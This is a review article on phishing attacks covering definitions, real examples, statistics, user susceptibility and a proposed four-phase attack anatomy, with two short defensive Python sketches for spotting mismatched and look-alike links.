phishing research report

REVIEW article

Phishing attacks: a recent comprehensive study and a new anatomy.

Cardiff School of Technologies, Cardiff Metropolitan University, Cardiff, United Kingdom

With the significant growth of internet usage, people increasingly share their personal information online. As a result, an enormous amount of personal information and financial transactions become vulnerable to cybercriminals. Phishing is an example of a highly effective form of cybercrime that enables criminals to deceive users and steal important data. Since the first reported phishing attack in 1990, it has evolved into a more sophisticated attack vector. At present, phishing is considered one of the most frequent examples of fraud activity on the Internet. Phishing attacks can lead to severe losses for their victims, including the loss of sensitive information, identity theft, and the exposure of company and government secrets. This article aims to evaluate these attacks by identifying the current state of phishing and reviewing existing phishing techniques. Studies have classified phishing attacks according to fundamental phishing mechanisms and countermeasures, disregarding the importance of the end-to-end lifecycle of phishing. This article proposes a new detailed anatomy of phishing which involves attack phases, attacker types, vulnerabilities, threats, targets, attack mediums, and attacking techniques. Moreover, the proposed anatomy will help readers understand the process lifecycle of a phishing attack, which in turn will increase awareness of these attacks and the techniques being used; it also helps in developing a holistic anti-phishing system. Furthermore, some precautionary countermeasures are investigated, and new strategies are suggested.

Introduction

The digital world is rapidly expanding and evolving, and so are cybercriminals, who rely on the illegal use of digital assets, especially personal information, to inflict damage on individuals. One of the most threatening crimes for all internet users is ‘identity theft’ ( Ramanathan and Wechsler, 2012 ), which is defined as impersonating a person’s identity to steal and use their personal information (e.g., bank details, social security number, or credit card numbers) for the attacker’s own gain, not just for stealing money but also for committing other crimes ( Arachchilage and Love, 2014 ). Cybercriminals have developed various methods for stealing information, but social-engineering-based attacks remain their favorite approach. One of the social engineering crimes that allow the attacker to perform identity theft is called a phishing attack. Phishing has been one of the biggest concerns as many internet users fall victim to it. It is a social engineering attack wherein a phisher attempts to lure users into revealing their sensitive information by illegitimately impersonating a public or trustworthy organization in an automated pattern, so that the internet user trusts the message and reveals sensitive information to the attacker ( Jakobsson and Myers, 2006 ). In phishing attacks, phishers use social engineering techniques to redirect users to malicious websites after they receive an email and follow an embedded link ( Gupta et al., 2015 ). Alternatively, attackers could exploit other mediums to execute their attacks, such as Voice over IP (VoIP), Short Message Service (SMS), and Instant Messaging (IM) ( Gupta et al., 2015 ). Phishers have also turned from sending mass-email messages, which target unspecified victims, to more selective phishing by sending their emails to specific victims, a technique called “spear-phishing.”

Cybercriminals usually exploit users who lack digital/cyber ethics or who are poorly trained, in addition to technical vulnerabilities, to reach their goals. Susceptibility to phishing varies between individuals according to their attributes and awareness level; therefore, in most attacks, phishers exploit human nature for hacking instead of utilising sophisticated technologies. Even though the weakness in the information security chain is attributed to humans more than to technology, there is a lack of understanding about which link in this chain is penetrated first. Studies found that certain personal characteristics make some persons more receptive to various lures ( Iuga et al., 2016 ; Ovelgönne et al., 2017 ; Crane, 2019 ). For example, individuals who usually obey authorities more than others are more likely to fall victim to a Business Email Compromise (BEC) message that pretends to be from a financial institution and requests immediate action, because they see it as a legitimate email ( Barracuda, 2020 ). Greed is another human weakness that could be used by an attacker, for example through emails offering great discounts, free gift cards, and similar rewards ( Workman, 2008 ).

Attackers use various channels to lure the victim, either directly through a scam or indirectly by delivering a payload, in order to gain sensitive and personal information from the victim ( Ollmann, 2004 ). Phishing attacks have already led to damaging losses and can affect the victim not only financially but also through other serious consequences such as loss of reputation or compromise of national security ( Ollmann, 2004 ; Herley and Florêncio, 2008 ). Cybercrime damages were expected to cost the world $6 trillion annually by 2021, up from $3 trillion in 2015, according to Cybersecurity Ventures ( Morgan, 2019 ). Phishing attacks are the most common type of cybersecurity breach, as stated by the official statistics from the Cyber Security Breaches Survey 2020 in the United Kingdom ( GOV.UK, 2020 ). Although these attacks affect organizations and individuals alike, the loss for organizations is significant and includes the cost of recovery, the loss of reputation, fines under information laws/regulations, and reduced productivity ( Medvet et al., 2008 ).

Phishing is a field of study that merges social psychology, technical systems, security subjects, and politics. Phishing attacks are becoming more prevalent: a recent study ( Proofpoint, 2020 ) found that nearly 90% of organizations faced targeted phishing attacks in 2019. Of these, 88% experienced spear-phishing attacks, 83% faced voice phishing (Vishing), 86% dealt with social media attacks, 84% reported SMS/text phishing (SMishing), and 81% reported malicious USB drops. The 2018 Proofpoint annual report ( Proofpoint, 2019a ) stated that phishing attacks jumped from 76% in 2017 to 83% in 2018, with all phishing types happening more frequently than in 2017. The number of phishing attacks identified in the second quarter of 2019 was notably higher than the number recorded in the previous three quarters, and the number in the first quarter of 2020 was higher than in the previous quarter, according to a report from the Anti-Phishing Working Group (APWG) ( APWG, 2018 ), which confirms that phishing attacks are on the rise. These findings show that phishing attacks have increased continuously in recent years, have become more sophisticated, and have gained more attention from cyber researchers and developers seeking to detect and mitigate their impact. This article aims to determine the severity of the phishing problem by providing detailed insights into the phishing phenomenon in terms of phishing definitions, current statistics, anatomy, and potential countermeasures.

The rest of the article is organized as follows. Phishing Definitions provides a number of phishing definitions as well as some real-world examples of phishing. The evolution and development of phishing attacks are discussed in Developing a Phishing Campaign . What Attributes Make Some People More Susceptible to Phishing Attacks Than Others explores the susceptibility to these attacks. The proposed phishing anatomy and types of phishing attacks are elaborated in Proposed Phishing Anatomy . In Countermeasures , various anti-phishing countermeasures are discussed. The conclusions of this study are drawn in Conclusion .

Phishing Definitions

Various definitions for the term “phishing” have been proposed and discussed by experts, researchers, and cybersecurity institutions. Although there is no established definition for the term “phishing” due to its continuous evolution, this term has been defined in numerous ways based on its use and context. The process of tricking the recipient into taking the attacker’s desired action is considered the de facto definition of phishing attacks in general. Some definitions name websites as the only possible medium to conduct attacks. The study ( Merwe et al., 2005 , p. 1) defines phishing as “a fraudulent activity that involves the creation of a replica of an existing web page to fool a user into submitting personal, financial, or password data.” The above definition describes phishing as an attempt to scam the user into revealing sensitive information, such as bank details and credit card numbers, by sending the user malicious links that lead to a fake website. Others name emails as the only attack vector. For instance, PishTank (2006) defines phishing as “a fraudulent attempt, usually made through email, to steal your personal information.” A description stated by ( Kirda and Kruegel, 2005 , p.1) defines phishing as “a form of online identity theft that aims to steal sensitive information such as online banking passwords and credit card information from users.” Some definitions highlight the usage of combined social and technical skills. For instance, APWG defines phishing as “a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials” ( APWG, 2018 , p. 1).
Moreover, the definition from the United States Computer Emergency Readiness Team (US-CERT) describes phishing as “a form of social engineering that uses email or malicious websites (among other channels) to solicit personal information from an individual or company by posing as a trustworthy organization or entity” ( CISA, 2018 ). A detailed definition has been presented in ( Jakobsson and Myers, 2006 , p. 1), which describes phishing as “a form of social engineering in which an attacker, also known as a phisher, attempts to fraudulently retrieve legitimate users’ confidential or sensitive credentials by mimicking electronic communications from a trustworthy or public organization in an automated fashion. Such communications are most frequently done through emails that direct users to fraudulent websites that in turn collect the credentials in question.”

In order to understand the anatomy of the phishing attack, a clear and detailed definition that underpins the existing definitions is needed. Since a phishing attack constitutes a mix of technical and social engineering tactics, a new definition (i.e., Anatomy) is proposed in this article, which describes the complete process of a phishing attack. This provides a better understanding for readers, as it covers phishing attacks in depth from a range of perspectives and angles, which might help beginner readers or researchers in this field. To this end, we define phishing as a socio-technical attack in which the attacker targets specific valuables by exploiting an existing vulnerability to pass a specific threat via a selected medium into the victim’s system, utilizing social engineering tricks or some other techniques to convince the victim to take a specific action that causes various types of damage.

Figure 1 depicts the general process flow for a phishing attack that contains four phases; these phases are elaborated in Proposed Phishing Anatomy . However, as shown in Figure 1 , in most attacks, the phishing process is initiated by gathering information about the target. Then the phisher decides which attack method is to be used in the attack as initial steps within the planning phase. The second phase is the preparation phase, in which the phisher starts to search for vulnerabilities through which he could trap the victim. The phisher conducts his attack in the third phase and waits for a response from the victim. In turn, the attacker could collect the spoils in the valuables acquisition phase, which is the last step in the phishing process. To elaborate the above phishing process using an example, an attacker may send a fraudulent email to an internet user pretending to be from the victim’s bank, requesting the user to confirm the bank account details, or else the account may be suspended. The user may think this email is legitimate since it uses the same graphic elements, trademarks, and colors of their legitimate bank. Submitted information will then be directly transmitted to the phisher who will use it for different malicious purposes such as money withdrawal, blackmailing, or committing further frauds.

FIGURE 1 . General phishing attack process.

Real-World Phishing Examples

Some real-world examples of phishing attacks are discussed in this section to present the complexity of some recent phishing attacks. Figure 2 shows a screenshot of a suspicious phishing email that passed a university’s spam filters and reached the recipient's mailbox. As shown in Figure 2 , the phisher conveys a sense of importance or urgency in the subject line through the word ‘important,’ so that the email triggers a psychological reaction that prompts the user to click the “View message” button. The email contains a suspicious embedded button: when hovering over it, the button does not match the Uniform Resource Locator (URL) shown in the status bar. Another clue in this example is that the sender's address is questionable and not known to the receiver. Clicking on the fake button will result either in the installation of a virus or worm onto the computer or in the user’s credentials being handed over after the victim is redirected to a fake login page.
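
The clue described above, a link whose displayed destination differs from the address it actually opens, can also be checked mechanically. The following is a minimal Python sketch rather than a method taken from the studies cited here. It assumes the email body is available as HTML; the names LinkCollector, host_of, and mismatched_links and the example host names are hypothetical. It flags only links whose visible text itself looks like a host name, so a button labelled “View message” would still need the manual hover check.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None   # href of the <a> currently open, if any
        self._text = []     # text fragments seen inside that <a>

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def host_of(value):
    """Return the lower-cased host name in value, or '' if there is none."""
    candidate = value if "://" in value else "//" + value
    return (urlparse(candidate).hostname or "").lower()


def mismatched_links(html):
    """Return links whose visible text names a different host than the href."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    flagged = []
    for text, href in parser.links:
        shown = host_of(text)
        actual = host_of(href)
        # Compare only when the visible text itself looks like a host name.
        if "." in shown and " " not in shown and shown != actual:
            flagged.append((text, href))
    return flagged


# Hypothetical email body: the first link shows one host but opens another.
sample = (
    '<p><a href="http://login.attacker.example/reset">www.mybank.example</a> '
    '<a href="https://www.mybank.example/help">www.mybank.example</a> '
    '<a href="http://x.example">View message</a></p>'
)
print(mismatched_links(sample))
```

A check of this kind catches only one narrow pattern; the questionable sender address mentioned above would need a separate test.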

FIGURE 2 . Screenshot of a real suspicious phishing email received by the authors’ institution in February 2019.

More recently, phishers have taken advantage of the Coronavirus pandemic (COVID-19) to fool their prey. Many Coronavirus-themed scam messages sent by attackers exploited people’s fear of contracting COVID-19 and their urgency to look for information related to Coronavirus (e.g., some of these attacks are related to Personal Protective Equipment (PPE) such as facemasks). The WHO stated that COVID-19 has created an infodemic, which is favorable for phishers ( Hewage, 2020 ). Cybercriminals also lured people into opening attachments by claiming that they contain information about people with Coronavirus within the local area.

Figure 3 shows an example of a phishing e-mail where the attacker claimed to be the recipient’s neighbor sending a message in which they pretended to be dying from the virus and threatening to infect the victim unless a ransom was paid ( Ksepersky, 2020 ).

FIGURE 3 . Screenshot of a coronavirus related phishing email ( Ksepersky, 2020 ).

Another example is the phishing attack spotted by a security researcher at Akamai in January 2019. The attack attempted to use Google Translate to mask suspicious URLs, prefacing them with the legitimate-looking “ www.translate.google.com ” address to dupe users into logging in ( Rhett, 2019 ). That attack was followed by phishing scams that, for example, asked for Netflix payment details or were embedded in promoted tweets that redirected users to genuine-looking PayPal login pages. Although the bogus page was very well designed in the latter case, the lack of a Hypertext Transfer Protocol Secure (HTTPS) lock and misspellings in the URL were key red flags (or giveaways) that this was actually a phishing attempt ( Keck, 2018 ). Figure 4A shows a screenshot of a phishing email received by the Federal Trade Commission (FTC). The email prompts the user to update their payment method by clicking on a link, pretending that Netflix is having a problem with the user's billing information ( FTC, 2018 ).

FIGURE 4 . Screenshot of the (A) Netflix scam email and (B) fraudulent text message (Apple) ( Keck, 2018 ; Rhett, 2019 )

Figure 4B shows a text message as another example of phishing that is difficult to spot as fake ( Pompon et al., 2018 ). The text message appears to come from Apple and asks the customer to update their account. A sense of urgency is used in the message as a lure to motivate the user to respond.

Developing a Phishing Campaign

Today, phishing is considered one of the most pressing cybersecurity threats for all internet users, regardless of their technical understanding and how cautious they are. These attacks are getting more sophisticated by the day and can cause severe losses to the victims. Although the attacker’s first motivation is stealing money, stolen sensitive data can be used for other malicious purposes such as infiltrating sensitive infrastructures for espionage purposes. Therefore, phishers keep on developing their techniques over time with the development of electronic media. The following sub-sections discuss phishing evolution and the latest statistics.

Historical Overview

Cybersecurity has been a major concern since the beginning of ARPANET, which is considered to be the first wide-area packet-switching network with distributed control and one of the first networks to implement the TCP/IP protocol suite. The term “phishing,” which was also called carding or brand spoofing, was coined in 1996, when hackers created randomized credit card numbers using an algorithm to steal users' passwords from America Online (AOL) ( Whitman and Mattord, 2012 ; Cui et al., 2017 ). Phishers then used instant messages or emails to reach users by posing as AOL employees to convince users to reveal their passwords. Attackers believed that requesting customers to update their account would be an effective way to get them to disclose their sensitive information; thereafter, phishers started to target larger financial companies. The author in ( Ollmann, 2004 ) believes that the “ph” in phishing comes from the term “Phreaks,” which was coined by John Draper, also known as Captain Crunch, and was used by early Internet criminals when they phreaked telephone systems. The “f” in ‘fishing’ was replaced with “ph” in “phishing,” as both words carry the same meaning: fishing for passwords and sensitive information in the sea of internet users. Over time, phishers developed various and more advanced types of scams for launching their attacks. Sometimes, the purpose of the attack is not limited to stealing sensitive information, but could involve injecting viruses or downloading a malicious program onto a victim's computer. Phishers make use of a trusted source (for instance a bank helpdesk) to deceive victims so that they disclose their sensitive information ( Ollmann, 2004 ).

Phishing attacks are rapidly evolving, and spoofing methods are continuously changing as a response to new corresponding countermeasures. Hackers take advantage of new tool-kits and technologies to exploit systems’ vulnerabilities and also use social engineering techniques to fool unsuspecting users. Therefore, phishing attacks continue to be one of the most successful cybercrime attacks.

The Latest Statistics of Phishing Attacks

Phishing attacks are becoming more common, and they are significantly increasing in both sophistication and frequency. Lately, phishing attacks have appeared in various forms. Different channels and threats are exploited and used by the attackers to trap more victims. These channels could be social networks or VoIP, which could carry various types of threats such as malicious attachments, embedded links within an email, instant messages, scam calls, or other types. Criminals know that social engineering-based methods are effective and profitable; therefore, they keep focusing on social engineering attacks, their favorite weapon, instead of concentrating on sophisticated techniques and toolkits. Phishing attacks have reached unprecedented levels, especially with emerging technologies such as mobile and social media ( Marforio et al., 2015 ). For instance, from 2017 to 2020, phishing attacks increased from 72 to 86% among businesses in the United Kingdom, and a large proportion of the attacks originated from social media ( GOV.UK, 2020 ).

The APWG Phishing Activity Trends Report analyzes and measures the evolution, proliferation, and propagation of phishing attacks reported to the APWG. Figure 5 shows the growth in phishing attacks from 2015 to 2020 by quarters based on APWG annual reports ( APWG, 2020 ). As demonstrated in Figure 5 , in the third quarter of 2019, the number of phishing attacks rose to 266,387, which is the highest level in three years since late 2016. This was up 46% from the 182,465 for the second quarter, and almost double the 138,328 seen in the fourth quarter of 2018. The number of unique phishing e-mails reported to APWG in the same quarter was 118,260. Furthermore, it was found that the number of brands targeted by phishing campaigns was 1,283.
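
The quarter-on-quarter comparison quoted above can be checked with a short calculation. The sketch below uses only the three attack counts given in the text; the helper name percent_change and the variable names are illustrative.

```python
def percent_change(old, new):
    """Relative change from old to new, expressed as a percentage."""
    return (new - old) / old * 100.0


# Attack counts quoted in the text (APWG, 2020).
q4_2018 = 138_328
q2_2019 = 182_465
q3_2019 = 266_387

growth = percent_change(q2_2019, q3_2019)  # roughly 46%
ratio = q3_2019 / q4_2018                  # roughly 1.93, i.e. "almost double"

print(f"Q2 2019 -> Q3 2019: +{growth:.0f}%")
print(f"Q3 2019 / Q4 2018: {ratio:.2f}x")
```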

FIGURE 5 . The growth in phishing attacks 2015–2020 by quarters based on data collected from APWG annual reports.

Cybercriminals always take advantage of disasters and topical events for their own gain. Since the beginning of the COVID-19 crisis, a variety of themed phishing and malware attacks have been launched by phishers against workers, healthcare facilities, and even the general public. A report from Microsoft ( Microsoft, 2020 ) showed that cyber-attacks related to COVID-19 had spiked to an unprecedented level in March; most of these scams were fake COVID-19 websites, according to security company RiskIQ ( RISKIQ, 2020 ). The total number of phishing attacks observed by APWG in the first quarter of 2020 was 165,772, up from the 162,155 observed in the fourth quarter of 2019. The number of unique phishing reports submitted to APWG during the first quarter of 2020 was 139,685, up from 132,553 in the fourth quarter of 2019, 122,359 in the third quarter of 2019, and 112,163 in the second quarter of 2019 ( APWG, 2020 ).

A study ( KeepnetLABS, 2018 ) confirmed that more than 91% of system breaches are caused by attacks initiated by email. Although cybercriminals use email as the main medium for their attacks, many organizations faced a high volume of other social engineering attacks in 2019, such as social media attacks, SMishing attacks, Vishing attacks, and USB-based attacks (for example, hiding and delivering malware to smartphones via USB phone chargers and distributing malware-laden free USB drives) ( Proofpoint, 2020 ). Info-security professionals reported a higher frequency of all types of social engineering attacks year-on-year, according to a report presented by Proofpoint. Spear phishing increased to 64% in 2018 from 53% in 2017, Vishing and/or SMishing increased to 49% from 45%, and USB attacks increased to 4% from 3%. The positive side shown in this study is that 59% of suspicious emails reported by end-users were classified as potential phishing, indicating that employees are becoming more security-aware, diligent, and thoughtful about the emails they receive ( Proofpoint, 2019a ). In all its forms, phishing can be one of the easiest cyber attacks to fall for. With the increasing levels of different phishing types, Proofpoint conducted a survey to identify the strengths and weaknesses of particular regions in terms of specific fundamental cybersecurity concepts. In this study, 7,000 end-users across seven countries (the US, United Kingdom, France, Germany, Italy, Australia, and Japan) were asked several questions about identifying terms such as phishing, ransomware, SMishing, and Vishing. Responses differed from country to country: respondents from the United Kingdom showed the highest familiarity with the term phishing, at 70%, and with the term ransomware, at 60%. In contrast, the United Kingdom recorded only 18% for each of Vishing and SMishing ( Proofpoint, 2019a ), as shown in Table 1 .

TABLE 1 . Percentage of respondents understanding multiple cybersecurity terms from different countries.

On the other hand, a report by Wombat Security reflects responses from more than 6,000 working adults across six countries (the US, United Kingdom, Germany, France, Italy, and Australia) about receiving fraudulent solicitations ( Ksepersky, 2020 ). Respondents from the United Kingdom stated that they had received fraudulent solicitations through the following sources: email 62%, phone call 27%, text message 16%, mailed letter 8%, and social media 10%; in addition, 17% confirmed that they had been the victim of identity theft ( Ksepersky, 2020 ). The consequences of responding to phishing are serious and costly. For instance, United Kingdom losses from financial fraud across payment cards, remote banking, and cheques totaled £768.8 million in 2016 ( Financial Fraud Action UK, 2017 ). Indeed, the losses resulting from phishing attacks are not limited to financial losses that might exceed millions of pounds, but also include the loss of customers and reputation. According to the 2020 State of the Phish report ( Proofpoint, 2020 ), damages from successful phishing attacks can range from lost productivity to cash outlay. The costs can include lost hours from employees, remediation time for information security teams, incident response costs, damage to reputation, lost intellectual property, direct monetary losses, compliance fines, lost customers, and legal fees.

There are many targets for phishing, including end-users, businesses, financial services (e.g., banks, credit card companies, and PayPal), retail (e.g., eBay, Amazon), and Internet Service Providers ( wombatsecurity.com, 2018 ). The organizations affected by attacks that Kaspersky Labs detected globally in the first quarter of 2020 are shown in Figure 6 . As shown in the figure, online stores were at the top of the targeted list (18.12%), followed by global Internet portals (16.44%) and social networks in third place (13.07%) ( Ksepersky, 2020 ). The most impersonated brands overall for the first quarter of 2020 were Apple, Netflix, Yahoo, WhatsApp, PayPal, Chase, Facebook, Microsoft, eBay, and Amazon ( Checkpoint, 2020 ).

FIGURE 6 . Distribution of organizations affected by phishing attacks detected by Kaspersky in quarter one of 2020.

Phishing attacks can take a variety of forms to target people and steal sensitive information from them. Current data shows that phishing attacks are still effective, which indicates that the available existing countermeasures are not enough to detect and prevent these attacks especially on smart devices. The social engineering element of the phishing attack has been effective in bypassing the existing defenses to date. Therefore, it is essential to understand what makes people fall victim to phishing attacks. What Attributes Make Some People More Susceptible to Phishing Attacks Than Others discusses the human attributes that are exploited by the phishers.

What Attributes Make Some People More Susceptible to Phishing Attacks Than Others

Why do most existing defenses against phishing not work? What personal and contextual attributes make some users more susceptible to phishing attacks than others? Different studies have discussed these two questions and examined the factors affecting susceptibility to a phishing attack and the reasons why people get phished. Human nature is considered one of the most influential factors in the process of phishing. Everyone is susceptible to phishing attacks because phishers play on an individual’s specific psychological/emotional triggers as well as technical vulnerabilities ( KeepnetLABS, 2018 ; Crane, 2019 ). For instance, individuals are likely to click on a link within an email when they see authority cues ( Furnell, 2007 ). In 2017, a report by PhishMe (2017) found that curiosity and urgency were the most common triggers that encourage people to respond to the attack; later, these triggers were replaced by entertainment, social media, and reward/recognition as the top emotional motivators. In the context of a phishing attack, psychological triggers often override people’s conscious decisions. For instance, when people are working under stress, they tend to make decisions without thinking of the possible consequences and options ( Lininger and Vines, 2005 ). Moreover, everyday stress can damage areas of the brain, which weakens control over emotions ( Keinan, 1987 ). Several studies have addressed the association between susceptibility to phishing and demographic variables (e.g., age and gender) in an attempt to identify the reasons behind phishing success across different population groups. Although everyone is susceptible to phishing, studies showed that some age groups are more susceptible to certain lures than others. For example, participants aged between 18 and 25 are more susceptible to phishing than other age groups ( Williams et al., 2018 ).
The reason that younger adults are more likely to fall for phishing is that they are more trusting when it comes to online communication and are also more likely to click on unsolicited e-mails ( Getsafeonline, 2017 ). Moreover, older participants are less susceptible because they tend to be less impulsive ( Arnsten et al., 2012 ). Some studies confirmed that women are more susceptible than men to phishing, as they click on links in phishing emails and enter information into phishing websites more often than men do. The study published by Getsafeonline (2017) identifies less technical know-how and experience among women than among men as the main reason for this. In contrast, a survey conducted by antivirus company Avast found that men are more susceptible to smartphone malware attacks than women ( Ong, 2014 ). These findings agree with the results of the study ( Hadlington, 2017 ), which found that men are more susceptible to mobile phishing attacks than women. The main reason behind this, according to Hadlington (2017), is that men are more comfortable and trusting when using mobile online services. The relationships between demographic characteristics of individuals and their ability to correctly detect a phishing attack have been studied in ( Iuga et al., 2016 ). The study showed that participants with high Personal Computer (PC) usage tend to identify phishing efforts more accurately and faster than other participants. Another study ( Hadlington, 2017 ) showed that internet addiction, attentional impulsivity, and motor impulsivity were significant positive predictors of risky cybersecurity behaviors, while a positive attitude toward cybersecurity in business was negatively related to risky cybersecurity behaviors. On the other hand, people’s trust in some websites/platforms is one of the weaknesses that scammers or crackers exploit, especially when that trust is based on a visual appearance that could fool the user ( Hadlington, 2017 ).
For example, fraudsters take advantage of people’s trust in a website by replacing a letter in the legitimate site's name with a number, such as goog1e.com instead of google.com . Another study ( Yeboah-Boateng and Amanor, 2014 ) demonstrates that although college students are unlikely to disclose personal information in response to an email, they could nonetheless easily be tricked by other tactics, making them alarmingly susceptible to email phishing attacks. The reason is that most college students do not have a grounding in ICT, especially in terms of security. Although security terms like viruses, online scams, and worms are known by some end-users, these users may have no knowledge of phishing, SMishing, Vishing, and similar attacks ( Lin et al., 2012 ). The study ( Yeboah-Boateng and Amanor, 2014 ) also shows that younger students are more susceptible than older students, and that students who worked full-time were less likely to fall for phishing.
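
The goog1e.com example can be illustrated with a simple look-alike check. The following Python sketch is an assumption-laden illustration, not a countermeasure proposed by the cited studies: the substitution table LOOKALIKES and the list TRUSTED are hypothetical and far from complete, and the function name imitated_domain is invented for this example. It maps digits that resemble letters back to those letters and reports when the result matches a trusted domain that the original string did not.

```python
# Hypothetical substitution table: digits commonly swapped in for similar letters.
LOOKALIKES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})

# Hypothetical list of domains the user actually trusts.
TRUSTED = {"google.com", "paypal.com"}


def imitated_domain(domain, trusted=TRUSTED):
    """Return the trusted domain that `domain` imitates, or None."""
    name = domain.lower().rstrip(".")
    if name in trusted:
        return None  # exact match: this is the genuine domain
    normalized = name.translate(LOOKALIKES)
    return normalized if normalized in trusted else None


for candidate in ("goog1e.com", "google.com", "example.org"):
    print(candidate, "->", imitated_domain(candidate))
```

Only single-character digit swaps are covered here; inserted, dropped, or visually similar non-ASCII characters would need a broader comparison.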

The study reported in ( Diaz et al., 2020 ) examines user click rates and demographics among undergraduates by sending phishing attacks to 1,350 randomly selected students. Students from various disciplines were involved in the test, from engineering and mathematics to arts and social sciences. The study observed that student susceptibility was affected by a range of factors such as phishing awareness, time spent on the computer, cyber training, age, academic year, and college affiliation. The most surprising finding is that those who have greater phishing knowledge are more susceptible to phishing scams. The authors offer two possible explanations for this unexpected finding. First, users' awareness of phishing might have increased as a result of repeatedly falling for phishing scams. Second, users who fell for the phish might have less knowledge about phishing than they claim. Other findings from this study agreed with those of other studies: older students were more able to detect a phishing email, and engineering and IT majors had some of the lowest click rates, as shown in Figure 7 , which indicates that some academic disciplines are more susceptible to phishing than others ( Bailey et al., 2008 ).

FIGURE 7 . The number of clicks on phishing emails by students in the College of Arts, Humanities, and Social Sciences (AHSS), the College of Engineering and Information Technology (EIT), and the College of Natural and Mathematical Sciences (NMS) at the University of Maryland, Baltimore County (UMBC) ( Diaz et al., 2020 ).

Psychological studies have also illustrated that the user’s ability to avoid phishing attacks is affected by different factors such as browser security indicators and the user's awareness of phishing. The authors in ( Dhamija et al., 2006 ) conducted an experimental study with 22 participants to test users' ability to recognize phishing websites. The study shows that 90% of these participants became victims of phishing websites and 23% of them ignored security indicators such as the status and address bar. In 2015, another study was conducted for the same purpose, in which a number of fake web pages were shown to the participants ( Alsharnouby et al., 2015 ). The results of this study showed that participants detected only 53% of phishing websites successfully. The authors also observed that the time spent looking at browser elements affected the ability to detect phishing. Lack of knowledge or awareness and carelessness are common reasons why people fall into a phishing trap. Most people have unknowingly opened a suspicious attachment or clicked a fake link that could lead to different levels of compromise. Therefore, training and preparing users to deal with such attacks are essential elements in minimizing the impact of phishing attacks.

Given the above discussion, susceptibility to phishing varies according to different factors such as age, gender, education level, and internet and PC addiction. Although every person has a trigger that phishers can exploit, even highly experienced people may fall prey to phishing because the sophistication of the attack makes it difficult to recognize. Therefore, it is inequitable that the user has always been blamed for falling for these attacks; developers must improve anti-phishing systems in a way that keeps the attack from reaching the user. Understanding the susceptibility of individuals to phishing attacks will help in developing better prevention and detection techniques and solutions.

Proposed Phishing Anatomy

Phishing process overview.

Generally, most phishing attacks start with an email ( Jagatic et al., 2007 ). The phishing email can be sent randomly to potential users or targeted at a specific group or individual. Many other vectors can also be used to initiate the attack, such as phone calls, instant messaging, or physical letters. The steps of the phishing process have been discussed by many researchers because understanding these steps is important in developing an anti-phishing solution. The author of the study ( Rouse, 2013 ) divides the phishing attack process into five phases: planning, setup, attack, collection, and cash. Another study ( Jakobsson and Myers, 2006 ) discusses the phishing process in detail and explains it as a sequence of phases: preparing for the attack, sending a malicious program using the selected vector, obtaining the user’s reaction to the attack, tricking the user into disclosing confidential information that is then transmitted to the phisher, and finally obtaining the targeted money. The study ( Abad, 2005 ), in turn, describes a phishing attack in three phases. The early phase includes initializing the attack, creating the phishing email, and sending it to the victim. The second phase includes the victim receiving the email and, if they respond, disclosing their information. In the final phase, the defrauding is successful. In essence, all phishing scams include three primary phases: the phisher requests sensitive valuables from the target, the target gives away these valuables to the phisher, and the phisher misuses these valuables for malicious purposes. These phases can be further divided into sub-processes according to phishing trends. Thus, a new anatomy for phishing attacks is proposed in this article, which expands and integrates previous definitions to cover the full life cycle of a phishing attack. The proposed anatomy, which consists of four phases, is shown in Figure 8 . It provides a reference structure for looking at phishing attacks in more detail and for understanding potential countermeasures to prevent them. Each phase and its components are explained as follows:

FIGURE 8 . The proposed anatomy of phishing, built upon the phishing definition proposed in this article, which was derived from our understanding of a phishing attack.

Figure 8 depicts the proposed anatomy of the phishing attack process, its phases, and its components, drawn upon the definition proposed in this article. The anatomy explains each phase in detail, including attacker and target types, examples of the information that the attacker could collect about the victim, and examples of attack methods. As shown in the figure, it also illustrates a set of vulnerabilities that the attacker can exploit and the mediums used to conduct the attack. Possible threats are listed as well, together with the data collection methods, examples of target response types, the types of spoils that the attacker could gain, and how the stolen valuables can be used. This anatomy elaborates on phishing attacks in depth, which helps people better understand the complete phishing process (i.e., the end-to-end phishing life cycle) and boosts awareness among readers. It also provides insights into the potential solutions for phishing attacks that we should focus on. Instead of always blaming the user as the only reason behind phishing success, developers must focus on solutions that mitigate the initiation of the attack by preventing the bait from reaching the user. For instance, to reach the target’s system, the threat has to pass through many layers of technology or defenses, exploiting one or more vulnerabilities such as web and software vulnerabilities.

Planning Phase

This is the first stage of the attack, in which a phisher decides on the targets (individuals or a company) and starts gathering information about them. Phishers gather information about the victims in order to lure them based on psychological vulnerability. This information can be anything, such as names and e-mail addresses for individuals, or the customers of a company. Victims can also be selected randomly by sending mass mailings, or targeted by harvesting their information from social media or any other source. A phishing target can be any user who has a bank account and an internet-connected computer. Phishers target businesses such as financial services, retail sectors such as eBay and Amazon, and internet service providers such as MSN/Hotmail and Yahoo ( Ollmann, 2004 ; Ramzan and Wuest, 2007 ). This phase also includes devising attack methods such as building fake websites (sometimes phishers obtain a scam page that has already been designed or used), designing malware, and constructing phishing emails. Attackers can be categorized based on their motivation. There are four types of attackers, as mentioned in studies ( Vishwanath, 2005 ; Okin, 2009 ; EDUCBA, 2017 ; APWG, 2020 ):

▪ Script kiddies: the term script kiddies refers to attackers with no technical background or knowledge of writing sophisticated programs or developing phishing tools; instead, they use scripts developed by others in their phishing attacks. Although the term comes from children who use available phishing kits to crack game codes by spreading malware using virus toolkits, it does not relate precisely to the actual age of the phisher. Script kiddies can get access to website administration privileges and commit a “Web cracking” attack. Moreover, they can use hacking tools to compromise remote computers and build a so-called “botnet,” in which each compromised computer is called a “zombie computer.” These attackers do not just sit back and enjoy phishing; they can cause serious damage such as stealing information or uploading Trojans or viruses. In February 2000, Distributed Denial of Service (DDoS) attacks launched by Canadian teen Mike Calce on CNN, eBay, Dell, Yahoo, and Amazon resulted in $1.7 million US Dollars (USD) in damages ( Leyden, 2001 ).

